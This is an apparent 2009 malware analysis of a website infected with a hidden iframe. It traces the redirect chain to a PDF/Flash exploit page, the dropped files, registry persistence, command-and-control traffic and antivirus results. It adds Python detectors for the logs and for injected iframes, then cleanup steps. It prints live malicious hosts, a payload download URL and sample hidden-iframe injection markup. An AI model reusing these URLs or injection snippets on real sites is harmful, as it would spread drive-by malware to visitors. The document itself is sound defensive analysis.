Analysis of a website infected with a hidden iframe
A user submitted a suspicious link that he had found in his own website, embedded as a hidden iframe. Malicious hidden iframes are usually inserted into the HTML pages of legitimate websites by attackers who want to spread their malware to every visitor of the compromised site. In most cases the attacker has either injected the iframe into every page of the website, or installed a redirect to another website that hosts exploits for commonly used web browsers and their plugins (in this case a PDF and a Flash file, as shown below).
The website can be compromised by an attacker because:
- Your website contains scripts that are vulnerable to RFI/SQL injection/XSS/LFI/RCE/etc.
- Your website is on a shared host: if an attacker has compromised one website hosted on the same server as yours, the attacker may be able to infect ALL the websites present on it, yours included.
Now let's see what happens when you visit the infected website that carries the hidden malicious iframe. The malicious hidden iframe looks like this:

After I browsed to the malicious URL I was redirected to another website that hosts a PDF exploit:

Internet traffic:

    GET /in.cgi?cocacola46 HTTP/1.1
    Host: litetopfindworld.cn

    HTTP/1.1 302 Found

    GET /index.php?cocacola46 HTTP/1.1
    Host: ghrgt.hostindianet.com

    HTTP/1.1 200 OK
    Server: nginx/0.6.35
    Content-Length: 6147
From the exploit screenshot we can see that the exploit page redirected my browser to two further resources, each loaded through yet another iframe:

    cache/readme.pdf => another iframe redirect
    cache/flash.swf  => another iframe redirect
It created various files in Temporary Internet Files related to the malicious URLs:

After the execution of the files downloaded by the exploit, new files were created on my system:

    C:\WINDOWS\system32\wbem\grpconv.exe
    C:\WINDOWS\Temp\wpv331238107706.exe
    C:\WINDOWS\Temp\wpv761238313566.exe
    C:\WINDOWS\system32\crypts.dll
    C:\Documents and Settings\user\user.exe
The file C:\Documents and Settings\user\user.exe had the +H (Hidden) attribute set and did not show up in Explorer searches. A DLL named crypts.dll was injected into explorer.exe, and user.exe created a new registry Run key so that it is launched every time Windows starts:

    HKCU\...\Run\user.exe
During the analysis the malware established connections with the following IPs and domains:

    94.247.3.152   (hs.3-152.zlkon.lv)
    213.155.4.82   (N/A)
    78.109.30.224  (reverse30-224.reserver.ru)
    94.247.2.95    (hs.2-95.zlkon.lv)
    68.180.151.74  (hansali4.com)
    83.133.127.5   (.)
Internet traffic:

    GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx HTTP/1.1
    Host: 213.155.4.82

    POST /good/receiver/online HTTP/1.1
    Host: 78.109.30.224
    Content-Length: 16

    guid=xxxxxx

    GET /bt.php?mod=&id=xxx&up=xxx&mid=soboc42 HTTP/1.1
    Host: af9f330a59.com

    0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;

    GET /731l2.exe HTTP/1.1
    Host: hansali4.com

    POST /gate/gate.php HTTP/1.0
    Host: mixmediadirect.cn

    194.8.74.51:443 => SSL traffic
The malware also started to connect to hotmail.com, probably to send spam to other addresses or something similar. The captured request is only a plain GET / (with an IE6 User-Agent) that is redirected to the Passport login page, so the purpose was not confirmed during this analysis:

    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    Host: hotmail.com
    Connection: Keep-Alive

    HTTP/1.1 302 Redirected
    Date: Sun, 29 Mar 2009 16:59:07 GMT
    Server: Microsoft-IIS/6.0
    Location: hxxp://lc1.bay0.hotmail.passport.com/cgi-bin/login
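The request chain captured above can be turned into a detection. The following Python script is an added example, not code from the original post or from NoVirusThanks: it classifies proxy-style log lines against the patterns seen in this infection, follows the bare campaign token (cocacola46) from the in.cgi redirector to the landing page it was handed to after the 302, and parses the KEY:value; configuration string that bt.php returned. The sample log is constructed from the hosts and paths shown above (the one-request-per-line format and the final benign www.example.org line are assumptions), and the indicator names are my own labels.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log, one "METHOD URL" per line. The hosts and paths are the
# ones captured in the post; the line format and the final benign line are assumptions.
SAMPLE_LOG = """\
GET http://litetopfindworld.cn/in.cgi?cocacola46
GET http://ghrgt.hostindianet.com/index.php?cocacola46
GET http://213.155.4.82/new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=xxx&rnd=xxx
POST http://78.109.30.224/good/receiver/online
GET http://af9f330a59.com/bt.php?mod=&id=xxx&up=xxx&mid=soboc42
GET http://hansali4.com/731l2.exe
POST http://mixmediadirect.cn/gate/gate.php
GET http://www.example.org/index.html
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify(method, url):
    """Return the indicator names (my own labels) that fire for one request."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    path = parts.path.lower()
    query = parts.query
    qs = parse_qs(query, keep_blank_values=True)
    hits = []
    # in.cgi?<bare token>: the redirector at the start of the chain, carrying a
    # campaign tag with no key=value structure
    if path.endswith("/in.cgi") and query and "=" not in query:
        hits.append("tds_redirect")
    # controller.php?action=bot: first check-in of the dropped bot
    if path.endswith("/controller.php") and qs.get("action") == ["bot"]:
        hits.append("bot_checkin")
    # bt.php?...&mid=...: beacon whose answer is the SLP/MOD/URL/SRV config string
    if path.endswith("/bt.php") and "mid" in qs:
        hits.append("bot_beacon")
    # POST to a gate.php: reporting endpoint
    if method == "POST" and path.endswith("/gate.php"):
        hits.append("gate_post")
    # Host is a bare IPv4 literal, no DNS name involved
    if IPV4.match(host):
        hits.append("ip_host")
    # Executable fetched over plain HTTP
    if path.endswith(".exe"):
        hits.append("exe_download")
    return hits


def scan_log(text):
    """Return [(url, [indicators])] for every request that triggers something."""
    alerts, tokens = [], set()
    for line in text.splitlines():
        if not line.strip():
            continue
        method, url = line.split(None, 1)
        url = url.strip()
        hits = classify(method.upper(), url)
        query = urlsplit(url).query
        if "tds_redirect" in hits:
            tokens.add(query)
        elif query in tokens:
            # Same bare campaign tag on a different host: the hop after the 302
            hits.append("tds_landing")
        if hits:
            alerts.append((url, hits))
    return alerts


def parse_bot_config(body):
    """Parse the 'KEY:value;KEY:value;' answer returned by bt.php. Each field is
    split on its first ':' only, because the URL value itself contains ':'.
    The post shows the URL defanged as hxxp; the parser keeps whatever it is given."""
    config = {}
    for field in body.strip().split(";"):
        if field:
            key, _, value = field.partition(":")
            config[key] = value
    return config


if __name__ == "__main__":
    for url, hits in scan_log(SAMPLE_LOG):
        print(f"{', '.join(hits):28s} {url}")
    print(parse_bot_config("0SLP:3600;MOD:dAcbf6;URL:hxxp://hansali4.com/731l2.exe;SRV:stoped;"))
```

The token-following rule is the useful part: the redirector and the landing page sit on different hosts, so a host blocklist built from the first hop misses the second, while the bare query string cocacola46 ties them together. Feed real proxy logs in by converting each record to the "METHOD URL" form before calling scan_log.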
These are the reports from the virus scanner. Note the gap between the two samples: the exploit landing page index[1].htm was detected by only 2 of 24 engines, while the dropped executable 731l2[1].exe was caught by 17 of 24.

Report Generated: 29.3.2009 at 19.57.41 (GMT 1)
File Name: index[1].htm
File Size: 6 KB
MD5 Hash: 2F9467513FAE3071B8EC831857963340
SHA1 Hash: 59C6D7D70F529762FAD7408360E016D6C816EFB3
Detection Rate: 2 of 24 (8.33%)
Status: INFECTED

Antivirus              Sig version        Engine Version   Result
a-squared              29/03/2009         4.0.0.32         -
Avira AntiVir          7.1.2.228          8.1.2.12         -
Avast                  090328-0           4.8.1229         -
AVG                    270.11.31/2028     8.0.0.0          -
BitDefender            29/03/2009         7.0.0.2555       -
ClamAV                 29/03/2009         0.93.1.0         -
Comodo                 1087               3.8              -
Dr.Web                 29/03/2009         5.0              -
Ewido                  29/03/2009         4.0.0.2          -
F-PROT 6               20090328           4.4.4.56         JS/Psyme.IX
G DATA                 19.3655            2.0.7309.847     -
IkarusT3               27/03/2009         1001044          -
Kaspersky              29/03/2009         8.0.0.357        Trojan-Downloader.JS.Agent.duy
McAfee                 29/03/2009         5.1.0.0          -
Malware Hash Registry  29/03/2009         N/A              -
NOD32 v3               3972               3.0.677          -
Norman                 2009/03/27         5.92.08          -
Panda                  07/02/2009         9.5.1.00         -
QuickHeal              28 March, 2009     10.0             -
Solo Antivirus         29/03/2009         8.0              -
Sophos                 29/03/2009         4.32.0           -
TrendMicro             927(592700)        1.1-1001         -
VBA32                  29/03/2009         3.12.0.300       -
VirusBuster            10.102.26          1.4.3            -
Report Generated: 29.3.2009 at 19.56.42 (GMT 1)
File Name: 731l2[1].exe
File Size: 71 KB
MD5 Hash: 6E14662D9469DFC1E6387F9C5D00513A
SHA1 Hash: C0E8B584E105ACED2A4CE403EF77CB45B3987E45
Detection Rate: 17 of 24 (70.83%)
Status: INFECTED

Antivirus              Sig version        Engine Version   Result
a-squared              29/03/2009         4.0.0.32         -
Avira AntiVir          7.1.2.228          8.1.2.12         TR/Downloader.Gen
Avast                  090328-0           4.8.1229         Win32:Trojan-gen {Other}
AVG                    270.11.31/2028     8.0.0.0          Downloader.Generic8.ZVT
BitDefender            29/03/2009         7.0.0.2555       Trojan.Generic.1545891
ClamAV                 29/03/2009         0.93.1.0         -
Comodo                 1087               3.8              Backdoor.Win32.KeyStart.~A
Dr.Web                 29/03/2009         5.0              Trojan.DownLoader.origin
Ewido                  29/03/2009         4.0.0.2          -
F-PROT 6               20090328           4.4.4.56         -
G DATA                 19.3655            2.0.7309.847     -
IkarusT3               27/03/2009         1001044          Backdoor.Win32.KeyStart
Kaspersky              29/03/2009         8.0.0.357        Backdoor.Win32.KeyStart.cb
McAfee                 29/03/2009         5.1.0.0          Generic Downloader.x trojan
Malware Hash Registry  29/03/2009         N/A              detect rate 74%
NOD32 v3               3972               3.0.677          Win32/TrojanDownloader.Agent.OWB
Norman                 2009/03/27         5.92.08          Trojan W32/DLoader.KZPW
Panda                  07/02/2009         9.5.1.00         -
QuickHeal              28 March, 2009     10.0             Backdoor.KeyStart.cb
Solo Antivirus         29/03/2009         8.0              Backdoor.Win32.KeyStart.CB
Sophos                 29/03/2009         4.32.0           Sus/Spy-B
TrendMicro             927(592700)        1.1-1001         -
VBA32                  29/03/2009         3.12.0.300       Backdoor.Win32.KeyStart.bz
VirusBuster            10.102.26          1.4.3            Backdoor.KeyStart.AD
What can I do if my website is infected?
- Clean the infected HTML/PHP pages
- Change the username and password of the FTP account
- Change the username and password of the email account
- Change the username and password of the SSH account
- Contact the server administrator and explain your situation
- Check your PHP files for possible vulnerabilities
- Update all the installed software (blog, forum, etc.)
- Remember never to copy the infected website to your PC as a "backup": the injected pages can infect the machine you open them on
- Always keep, and restore from, known-clean local backups of the website files
The first action the system administrator needs to take is to remove the malicious hidden iframe code from all HTML pages, and then check the logs and the code of the installed PHP scripts for possibly vulnerable code. It is very important to change all the usernames and passwords of all the accounts present on the server.
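Finding every injected iframe is the first step of the cleanup above, and grepping for "<iframe" is not enough when the tag is written by a script. The following Python scanner is an added example, not code from the original post or from NoVirusThanks: it parses HTML pages and flags iframes that are hidden with CSS, sized 0x0 or 1x1, point to a host that is not the site's own, or are emitted by document.write() inside a script block (a variant the post does not show, added here because it defeats a plain text search). The sample pages are constructed for the example, the set of site hostnames is an assumption you supply, and scan_directory applies the same check to a web root on disk.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample pages for the example; they are not files from the
# compromised site in the post. Only the iframe targets reuse hosts seen above.
SAMPLE_PAGES = {
    "index.html": """<html><body><h1>Welcome</h1>
<iframe src="http://litetopfindworld.cn/in.cgi?cocacola46" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>""",
    "about.html": """<html><body><p>About us</p>
<iframe src="/videos/embed.html" width="640" height="480"></iframe>
</body></html>""",
    "contact.html": """<html><body>
<script>document.write('<iframe src="http://ghrgt.hostindianet.com/index.php?cocacola46" style="display:none"></iframe>');</script>
</body></html>""",
}

# CSS that makes an element invisible or (near) zero-sized
HIDDEN_CSS = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*[01](?:px)?\b", re.I)
ZERO_SIZE = {"0", "1", "0px", "1px"}
IFRAME_IN_TEXT = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_IN_TEXT = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]*)""")


class IframeFinder(HTMLParser):
    """Collect iframes that look injected rather than part of the site."""

    def __init__(self, site_hosts):
        super().__init__()
        self.site_hosts = {h.lower() for h in site_hosts}  # assumption: the site's own hostnames
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            self._check_iframe(dict(attrs), via="html")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # An iframe emitted by document.write() is only text to the parser,
        # so pull it out of the script body by hand.
        if self._in_script:
            for m in IFRAME_IN_TEXT.finditer(data):
                self._check_iframe(dict(ATTR_IN_TEXT.findall(m.group(1))), via="script")

    def _check_iframe(self, attrs, via):
        reasons = []
        src = attrs.get("src") or ""
        host = urlsplit(src).hostname
        if host and host.lower() not in self.site_hosts:
            reasons.append("external_src")
        if HIDDEN_CSS.search(attrs.get("style") or ""):
            reasons.append("hidden_style")
        if attrs.get("width") in ZERO_SIZE and attrs.get("height") in ZERO_SIZE:
            reasons.append("zero_size")
        if via == "script":
            reasons.append("document_write")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def scan_page(html, site_hosts):
    finder = IframeFinder(site_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_site(pages, site_hosts):
    """pages: {filename: html}. Returns only the files with suspicious iframes."""
    report = {}
    for name, html in pages.items():
        findings = scan_page(html, site_hosts)
        if findings:
            report[name] = findings
    return report


def scan_directory(root, site_hosts, exts=(".html", ".htm", ".php")):
    """Walk a web root on disk and scan every page-like file."""
    pages = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    pages[path] = fh.read()
    return scan_site(pages, site_hosts)


if __name__ == "__main__":
    for name, findings in scan_site(SAMPLE_PAGES, {"www.example.com"}).items():
        for f in findings:
            print(f"{name}: {f['src']}  [{', '.join(f['reasons'])}]")
```

Run it against a copy of the web root taken on the server (not on your own PC, for the reason given in the list above), and review every reported file before restoring a clean copy; a legitimate embedded video, as in about.html, is left alone because it is neither hidden, zero-sized nor off-site.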
How can I remove the malware infection from my computer?
1) Delete all the created files, in my case:

    C:\WINDOWS\system32\wbem\grpconv.exe
    C:\WINDOWS\Temp\wpv331238107706.exe
    C:\WINDOWS\Temp\wpv761238313566.exe
    C:\WINDOWS\system32\crypts.dll
    C:\Documents and Settings\user\user.exe

Since crypts.dll is loaded inside explorer.exe, it will be in use while Windows is running normally; delete it from Safe Mode or after terminating the process that holds it. user.exe has the Hidden attribute, so enable the display of hidden files or remove it from the command line.
2) Delete the malicious registry keys, in my case:

    HKCU\...\Run\user.exe

3) Run a complete system scan with your antivirus to detect other possible trojans installed on your computer.
4) Scan your system with NoVirusThanks Malware Remover.
Another very similar analysis to this:
Website with hidden iframe and Malware Analysis
March 31st, 2009 at 3:00 am
Thanks for this. I just ran into almost the exact same redirect/infection.
April 1st, 2009 at 8:32 pm
Thank you, Robert! Your info is very helpful and really cures (it was checked yesterday :).
January 13th, 2010 at 6:40 am
Step 1: change the FTP password
Step 2: download all files and clean them
Step 3: upload the files
Step 4: set 444 permissions on all files, except custom upload folders
Remember: do not save the FTP password in your FTP client.
If you suspect that your system is infected, format and install the OS, then install a good antivirus + firewall. I suggest Avast free edition and Comodo Firewall.
We have received many inquiries and we have cleaned those infected sites. If your site is infected, please contact us.
Best Regards,
Team HelloSystemadmin.com